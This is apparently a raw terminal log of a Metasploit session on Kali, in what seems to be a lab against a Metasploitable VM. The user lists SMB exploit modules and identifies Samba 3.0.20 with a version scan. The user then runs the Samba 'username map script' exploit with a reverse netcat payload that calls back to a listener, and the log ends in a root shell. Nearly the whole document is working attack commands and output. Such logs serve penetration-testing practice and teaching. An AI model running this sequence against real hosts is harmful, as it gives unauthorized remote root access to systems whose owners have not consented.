┌──(kali㉿kali)-[~]
└─$ msfconsole
                                                  

     .~+P``````-o+:.                                      -o+:.
.+oooyysyyssyyssyddh++os-`````                        ```````````````          `
+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o
++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
--.`                 .-.-...-////+++++++++++++++////////~~//////++++++++++++///
                                `...............`              `...-/////...`


                                  .::::::::::-.                     .::::::-
                                .hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo
                                 :Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy
                                 .sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh`
                                  -Nd`  :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh`
                                   -Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/
    `oo/``-hd:  ``                 .sNd  :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/
      .yNmMMh//+syysso-``````       -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd
    .shMMMMN//dmNMMMMMMMMMMMMs`     `:```-o++++oooo+:/ooooo+:+o+++oooo++/
    `///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os:
          /MMMMMMMMMMMMMMMMMMd.     `/++-.-yy/...osydh/-+oo:-`o//...oyodh+
          -hMMmssddd+:dMMmNMMh.     `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`::
          .sMMmo.    -dMd--:mN/`           ||--X--||          ||--X--||
........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//.........
================================================================================
=====================+--------------------------------+=========================
=====================| Session one died of dysentery. |=========================
=====================+--------------------------------+=========================
================================================================================

                     Press ENTER to size up the situation

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

                        Press SPACE BAR to continue



       =[ metasploit v6.3.4-dev                           ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post       ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Writing a custom module? After editing your 
module, why not try the reload command
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search smb

Matching Modules
================

   #    Name                                                               Disclosure Date  Rank       Check  Description
   -    ----                                                               ---------------  ----       -----  -----------
   0    exploit/multi/http/struts_code_exec_classloader                    2014-03-06       manual     No     Apache Struts ClassLoader Manipulation Remote Code Execution
   1    exploit/osx/browser/safari_file_policy                             2011-10-12       normal     No     Apple Safari file:// Arbitrary Code Execution
   2    auxiliary/server/capture/smb                                                        normal     No     Authentication Capture: SMB
   3    post/linux/busybox/smb_share_root                                                   normal     No     BusyBox SMB Sharing
   4    exploit/linux/misc/cisco_rv340_sslvpn                              2022-02-02       good       Yes    Cisco RV340 SSL VPN Unauthenticated Remote Code Execution
   5    auxiliary/scanner/http/citrix_dir_traversal                        2019-12-17       normal     No     Citrix ADC (NetScaler) Directory Traversal Scanner
   6    auxiliary/scanner/smb/impacket/dcomexec                            2018-03-19       normal     No     DCOM Exec
   7    auxiliary/scanner/smb/impacket/secretsdump                                          normal     No     DCOM Exec
   8    auxiliary/scanner/dcerpc/dfscoerce                                                  normal     No     DFSCoerce
   9    exploit/windows/scada/ge_proficy_cimplicity_gefebt                 2014-01-23       excellent  Yes    GE Proficy CIMPLICITY gefebt.exe Remote Code Execution
   10   exploit/windows/smb/generic_smb_dll_injection                      2015-03-04       manual     No     Generic DLL Injection From Shared Resource
   11   exploit/windows/http/generic_http_dll_injection                    2015-03-04       manual     No     Generic Web Application DLL Injection
   12   exploit/windows/smb/group_policy_startup                           2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
   13   exploit/windows/misc/hp_dataprotector_install_service              2011-11-02       excellent  Yes    HP Data Protector 6.10/6.11/6.20 Install Service
   14   exploit/windows/misc/hp_dataprotector_cmd_exec                     2014-11-02       excellent  Yes    HP Data Protector 8.10 Remote Command Execution
   15   auxiliary/server/http_ntlmrelay                                                     normal     No     HTTP Client MS Credential Relayer
   16   exploit/windows/smb/ipass_pipe_exec                                2015-01-21       excellent  Yes    IPass Control Pipe Remote Command Execution
   17   auxiliary/gather/konica_minolta_pwd_extract                                         normal     No     Konica Minolta Password Extractor
   18   auxiliary/fileformat/odt_badodt                                    2018-05-01       normal     No     LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator
   19   post/linux/gather/mount_cifs_creds                                                  normal     No     Linux Gather Saved mount.cifs/mount.smbfs Credentials
   20   exploit/windows/smb/ms03_049_netapi                                2003-11-11       good       No     MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
   21   exploit/windows/smb/ms04_007_killbill                              2004-02-10       low        No     MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow
   22   exploit/windows/smb/ms04_011_lsass                                 2004-04-13       good       No     MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
   23   exploit/windows/smb/ms04_031_netdde                                2004-10-12       good       No     MS04-031 Microsoft NetDDE Service Overflow
   24   exploit/windows/smb/ms05_039_pnp                                   2005-08-09       good       Yes    MS05-039 Microsoft Plug and Play Service Overflow
   25   exploit/windows/smb/ms06_025_rras                                  2006-06-13       average    No     MS06-025 Microsoft RRAS Service Overflow
   26   exploit/windows/smb/ms06_025_rasmans_reg                           2006-06-13       good       No     MS06-025 Microsoft RRAS Service RASMAN Registry Overflow
   27   exploit/windows/smb/ms06_040_netapi                                2006-08-08       good       No     MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
   28   exploit/windows/smb/ms06_066_nwapi                                 2006-11-14       good       No     MS06-066 Microsoft Services nwapi32.dll Module Exploit
   29   exploit/windows/smb/ms06_066_nwwks                                 2006-11-14       good       No     MS06-066 Microsoft Services nwwks.dll Module Exploit
   30   exploit/windows/smb/ms06_070_wkssvc                                2006-11-14       manual     No     MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
   31   exploit/windows/smb/ms07_029_msdns_zonename                        2007-04-12       manual     No     MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
   32   exploit/windows/smb/ms08_067_netapi                                2008-10-28       great      Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption
   33   exploit/windows/smb/smb_relay                                      2001-03-31       excellent  No     MS08-068 Microsoft Windows SMB Relay Code Execution
   34   exploit/windows/smb/ms09_050_smb2_negotiate_func_index             2009-09-07       good       No     MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   35   exploit/windows/browser/ms10_022_ie_vbscript_winhlp32              2010-02-26       great      No     MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution
   36   exploit/windows/smb/ms10_061_spoolss                               2010-09-14       excellent  No     MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability
   37   exploit/windows/fileformat/ms13_071_theme                          2013-09-10       excellent  No     MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution
   38   exploit/windows/fileformat/ms14_060_sandworm                       2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
   39   exploit/windows/smb/ms17_010_eternalblue                           2017-03-14       average    Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   40   exploit/windows/smb/ms17_010_psexec                                2017-03-14       normal     Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   41   auxiliary/admin/smb/ms17_010_command                               2017-03-14       normal     No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   42   auxiliary/scanner/smb/smb_ms17_010                                                  normal     No     MS17-010 SMB RCE Detection
   43   auxiliary/dos/windows/smb/ms05_047_pnp                                              normal     No     Microsoft Plug and Play Service Registry Overflow
   44   auxiliary/dos/windows/smb/rras_vls_null_deref                      2006-06-14       normal     No     Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference
   45   auxiliary/admin/mssql/mssql_ntlm_stealer                                            normal     No     Microsoft SQL Server NTLM Stealer
   46   auxiliary/admin/mssql/mssql_ntlm_stealer_sqli                                       normal     No     Microsoft SQL Server SQLi NTLM Stealer
   47   auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                               normal     No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
   48   auxiliary/admin/mssql/mssql_enum_domain_accounts                                    normal     No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
   49   auxiliary/dos/windows/smb/ms06_035_mailslot                        2006-07-11       normal     No     Microsoft SRV.SYS Mailslot Write Corruption
   50   auxiliary/dos/windows/smb/ms06_063_trans                                            normal     No     Microsoft SRV.SYS Pipe Transaction No Null
   51   auxiliary/dos/windows/smb/ms09_001_write                                            normal     No     Microsoft SRV.SYS WriteAndX Invalid DataOffset
   52   auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh                           normal     No     Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   53   auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff                              normal     No     Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
   54   auxiliary/dos/windows/smb/vista_negotiate_stop                                      normal     No     Microsoft Vista SP0 SMB Negotiate Protocol DoS
   55   auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop                          normal     No     Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop
   56   auxiliary/scanner/smb/psexec_loggedin_users                                         normal     No     Microsoft Windows Authenticated Logged In Users Enumeration
   57   exploit/windows/smb/psexec                                         1999-01-01       manual     No     Microsoft Windows Authenticated User Code Execution
   58   auxiliary/dos/windows/smb/ms11_019_electbowser                                      normal     No     Microsoft Windows Browser Pool DoS
   59   exploit/windows/smb/smb_rras_erraticgopher                         2017-06-13       average    Yes    Microsoft Windows RRAS Service MIBEntryGet Overflow
   60   exploit/windows/smb/smb_shadow                                     2021-02-16       manual     No     Microsoft Windows SMB Direct Session Takeover
   61   auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow                            normal     No     Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
   62   exploit/windows/smb/ms10_046_shortcut_icon_dllloader               2010-07-16       excellent  No     Microsoft Windows Shell LNK Code Execution
   63   exploit/windows/smb/ms15_020_shortcut_icon_dllloader               2015-03-10       excellent  No     Microsoft Windows Shell LNK Code Execution
   64   auxiliary/docx/word_unc_injector                                                    normal     No     Microsoft Word UNC Path Injector
   65   auxiliary/spoof/nbns/nbns_response                                                  normal     No     NetBIOS Name Service Spoofer
   66   exploit/windows/smb/netidentity_xtierrpcpipe                       2009-04-06       great      No     Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow
   67   exploit/netware/smb/lsass_cifs                                     2007-01-21       average    No     Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow
   68   exploit/windows/oracle/extjob                                      2007-01-01       excellent  Yes    Oracle Job Scheduler Named Pipe Command Execution
   69   auxiliary/admin/oracle/ora_ntlm_stealer                            2009-04-07       normal     No     Oracle SMB Relay Code Execution
   70   auxiliary/scanner/dcerpc/petitpotam                                                 normal     No     PetitPotam
   71   payload/cmd/windows/powershell/x64/custom/reverse_named_pipe                        normal     No     Powershell Exec, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager
   72   payload/cmd/windows/powershell/custom/reverse_named_pipe                            normal     No     Powershell Exec, Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager
   73   payload/cmd/windows/powershell/x64/meterpreter/reverse_named_pipe                   normal     No     Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager
   74   payload/cmd/windows/powershell/x64/peinject/reverse_named_pipe                      normal     No     Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager
   75   payload/cmd/windows/powershell/meterpreter/reverse_named_pipe                       normal     No     Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager
   76   payload/cmd/windows/powershell/peinject/reverse_named_pipe                          normal     No     Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager
   77   auxiliary/admin/smb/psexec_ntdsgrab                                                 normal     No     PsExec NTDS.dit And SYSTEM Hive Download Utility
   78   auxiliary/scanner/sap/sap_smb_relay                                                 normal     No     SAP SMB Relay Abuse                                                                                                     
   79   auxiliary/dos/sap/sap_soap_rfc_eps_delete_file                                      normal     No     SAP SOAP EPS_DELETE_FILE File Deletion
   80   auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing                        normal     No     SAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories Information Disclosure
   81   auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence                      normal     No     SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check
   82   auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir                                     normal     No     SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing
   83   auxiliary/fuzzers/smb/smb_create_pipe_corrupt                                       normal     No     SMB Create Pipe Request Corruption
   84   auxiliary/fuzzers/smb/smb_create_pipe                                               normal     No     SMB Create Pipe Request Fuzzer
   85   exploit/windows/smb/smb_doublepulsar_rce                           2017-04-14       great      Yes    SMB DOUBLEPULSAR Remote Code Execution
   86   exploit/windows/smb/smb_delivery                                   2016-07-26       excellent  No     SMB Delivery
   87   auxiliary/admin/smb/list_directory                                                  normal     No     SMB Directory Listing Utility
   88   auxiliary/scanner/smb/smb_enumusers_domain                                          normal     No     SMB Domain User Enumeration
   89   auxiliary/admin/smb/delete_file                                                     normal     No     SMB File Delete Utility
   90   auxiliary/admin/smb/download_file                                                   normal     No     SMB File Download Utility
   91   auxiliary/admin/smb/upload_file                                                     normal     No     SMB File Upload Utility
   92   auxiliary/scanner/smb/smb_enum_gpp                                                  normal     No     SMB Group Policy Preference Saved Passwords Enumeration
   93   auxiliary/scanner/smb/smb_login                                                     normal     No     SMB Login Check Scanner
   94   auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt                                       normal     No     SMB NTLMv1 Login Request Corruption
   95   auxiliary/fuzzers/smb/smb_negotiate_corrupt                                         normal     No     SMB Negotiate Dialect Corruption
   96   auxiliary/fuzzers/smb/smb2_negotiate_corrupt                                        normal     No     SMB Negotiate SMB2 Dialect Corruption
   97   auxiliary/scanner/smb/smb_lookupsid                                                 normal     No     SMB SID User Enumeration (LookupSid)
   98   auxiliary/admin/smb/check_dir_file                                                  normal     No     SMB Scanner Check File/Directory Utility
   99   auxiliary/scanner/smb/pipe_auditor                                                  normal     No     SMB Session Pipe Auditor
   100  auxiliary/scanner/smb/pipe_dcerpc_auditor                                           normal     No     SMB Session Pipe DCERPC Auditor
   101  auxiliary/scanner/smb/smb_enumshares                                                normal     No     SMB Share Enumeration
   102  auxiliary/fuzzers/smb/smb_tree_connect_corrupt                                      normal     No     SMB Tree Connect Request Corruption
   103  auxiliary/fuzzers/smb/smb_tree_connect                                              normal     No     SMB Tree Connect Request Fuzzer
   104  auxiliary/scanner/smb/smb_enumusers                                                 normal     No     SMB User Enumeration (SAM EnumUsers)
   105  auxiliary/scanner/smb/smb_version                                                   normal     No     SMB Version Detection
   106  auxiliary/dos/smb/smb_loris                                        2017-06-29       normal     No     SMBLoris NBSS Denial of Service
   107  exploit/windows/local/cve_2020_0796_smbghost                       2020-03-13       good       Yes    SMBv3 Compression Buffer Overflow
   108  exploit/windows/smb/cve_2020_0796_smbghost                         2020-03-13       average    Yes    SMBv3 Compression Buffer Overflow
   109  auxiliary/scanner/snmp/snmp_enumshares                                              normal     No     SNMP Windows SMB Share Enumeration
   110  auxiliary/admin/smb/samba_symlink_traversal                                         normal     No     Samba Symlink Directory Traversal
   111  auxiliary/scanner/smb/smb_uninit_cred                                               normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   112  exploit/linux/samba/chain_reply                                    2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   113  auxiliary/dos/samba/read_nttrans_ea_list                                            normal     No     Samba read_nttrans_ea_list Integer Overflow
   114  exploit/multi/ids/snort_dce_rpc                                    2007-02-19       good       No     Snort 2 DCE/RPC Preprocessor Buffer Overflow
   115  exploit/windows/browser/java_ws_double_quote                       2012-10-16       excellent  No     Sun Java Web Start Double Quote Injection
   116  exploit/windows/browser/java_ws_arginject_altjvm                   2010-04-09       excellent  No     Sun Java Web Start Plugin Command Line Argument Injection
   117  exploit/windows/browser/java_ws_vmargs                             2012-02-14       excellent  No     Sun Java Web Start Plugin Command Line Argument Injection
   118  auxiliary/server/teamviewer_uri_smb_redirect                                        normal     No     TeamViewer Unquoted URI Handler SMB Redirect
   119  exploit/windows/smb/timbuktu_plughntcommand_bof                    2009-06-25       great      No     Timbuktu PlughNTCommand Named Pipe Buffer Overflow
   120  exploit/windows/fileformat/ursoft_w32dasm                          2005-01-24       good       No     URSoft W32Dasm Disassembler Function Buffer Overflow
   121  exploit/windows/fileformat/vlc_smb_uri                             2009-06-24       great      No     VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow
   122  auxiliary/scanner/smb/impacket/wmiexec                             2018-03-19       normal     No     WMI Exec
   123  auxiliary/admin/smb/webexec_command                                                 normal     No     WebEx Remote Command Execution Utility
   124  exploit/windows/smb/webexec                                        2018-10-24       manual     No     WebExec Authenticated User Code Execution
   125  post/windows/escalate/droplnk                                                       normal     No     Windows Escalate SMB Icon LNK Dropper
   126  post/windows/gather/credentials/gpp                                                 normal     No     Windows Gather Group Policy Preference Saved Passwords
   127  post/windows/gather/word_unc_injector                                               normal     No     Windows Gather Microsoft Office Word UNC Path Injector
   128  post/windows/gather/enum_shares                                                     normal     No     Windows Gather SMB Share Enumeration via Registry
   129  payload/windows/peinject/reverse_named_pipe                                         normal     No     Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
   130  payload/windows/x64/peinject/reverse_named_pipe                                     normal     No     Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
   131  payload/windows/x64/meterpreter/reverse_named_pipe                                  normal     No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
   132  payload/windows/meterpreter/reverse_named_pipe                                      normal     No     Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
   133  post/windows/gather/netlm_downgrade                                                 normal     No     Windows NetLM Downgrade Attack
   134  auxiliary/fileformat/multidrop                                                      normal     No     Windows SMB Multi Dropper
   135  payload/windows/x64/custom/reverse_named_pipe                                       normal     No     Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager
   136  payload/windows/custom/reverse_named_pipe                                           normal     No     Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager


Interact with a module by name or index. For example info 136, use 136 or use payload/windows/custom/reverse_named_pipe                                                                                                               

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/
                                       basics/using-metasploit.html
   THREADS  1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_version) > set rhost 192.168.1.37
rhost => 192.168.1.37
msf6 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.1.37     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/
                                       basics/using-metasploit.html
   THREADS  1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.1.37:445      - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.1.37:445      -   Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.1.37:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) > search samba

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                 ---------------  ----       -----  -----------
   0   exploit/unix/webapp/citrix_access_gateway_exec       2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution
   1   exploit/windows/license/calicclnt_getconfig          2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow
   2   exploit/unix/misc/distcc_exec                        2002-02-01       excellent  Yes    DistCC Daemon Command Execution
   3   exploit/windows/smb/group_policy_startup             2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
   4   post/linux/gather/enum_configs                                        normal     No     Linux Gather Configurations
   5   auxiliary/scanner/rsync/modules_list                                  normal     No     List Rsync Modules
   6   exploit/windows/fileformat/ms14_060_sandworm         2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
   7   exploit/unix/http/quest_kace_systems_management_rce  2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection
   8   exploit/multi/samba/usermap_script                   2007-05-14       excellent  No     Samba "username map script" Command Execution
   9   exploit/multi/samba/nttrans                          2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   10  exploit/linux/samba/setinfopolicy_heap               2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   11  auxiliary/admin/smb/samba_symlink_traversal                           normal     No     Samba Symlink Directory Traversal
   12  auxiliary/scanner/smb/smb_uninit_cred                                 normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   13  exploit/linux/samba/chain_reply                      2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   14  exploit/linux/samba/is_known_pipename                2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   15  auxiliary/dos/samba/lsa_addprivs_heap                                 normal     No     Samba lsa_io_privilege_set Heap Overflow
   16  auxiliary/dos/samba/lsa_transnames_heap                               normal     No     Samba lsa_io_trans_names Heap Overflow
   17  exploit/linux/samba/lsa_transnames_heap              2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   18  exploit/osx/samba/lsa_transnames_heap                2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   19  exploit/solaris/samba/lsa_transnames_heap            2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   20  auxiliary/dos/samba/read_nttrans_ea_list                              normal     No     Samba read_nttrans_ea_list Integer Overflow
   21  exploit/freebsd/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)
   22  exploit/linux/samba/trans2open                       2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
   23  exploit/osx/samba/trans2open                         2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)
   24  exploit/solaris/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)
   25  exploit/windows/http/sambar6_search_results          2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow


Interact with a module by name or index. For example info 25, use 25 or use exploit/windows/http/sambar6_search_results                                                                                                               

msf6 auxiliary(scanner/smb/smb_version) > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/b
                                      asics/using-metasploit.html
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.38     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/samba/usermap_script) > set rhost 192.168.1.37
rhost => 192.168.1.37
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.1.37     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/b
                                      asics/using-metasploit.html
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.38     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 192.168.1.38:4444 
[*] Command shell session 1 opened (192.168.1.38:4444 -> 192.168.1.37:43876) at 2023-07-30 18:07:49 -0400

whoami
root
name -a
/bin/sh: line 4: name: command not found
hostname
metasploitable
